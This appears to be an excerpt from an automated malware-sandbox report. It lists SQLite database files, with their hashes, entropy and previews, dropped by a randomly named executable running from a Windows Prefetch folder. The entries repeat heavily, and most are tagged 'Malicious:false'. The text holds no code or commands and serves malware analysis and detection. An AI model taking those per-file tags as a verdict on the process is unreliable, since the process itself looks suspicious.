                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5712781801655107
                                                            Encrypted:false
                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5707520969659783
                                                            Encrypted:false
                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8439810553697228
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                            MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                            SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                            SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                            SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5707520969659783
                                                            Encrypted:false
                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8439810553697228
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                            MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                            SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                            SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                            SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
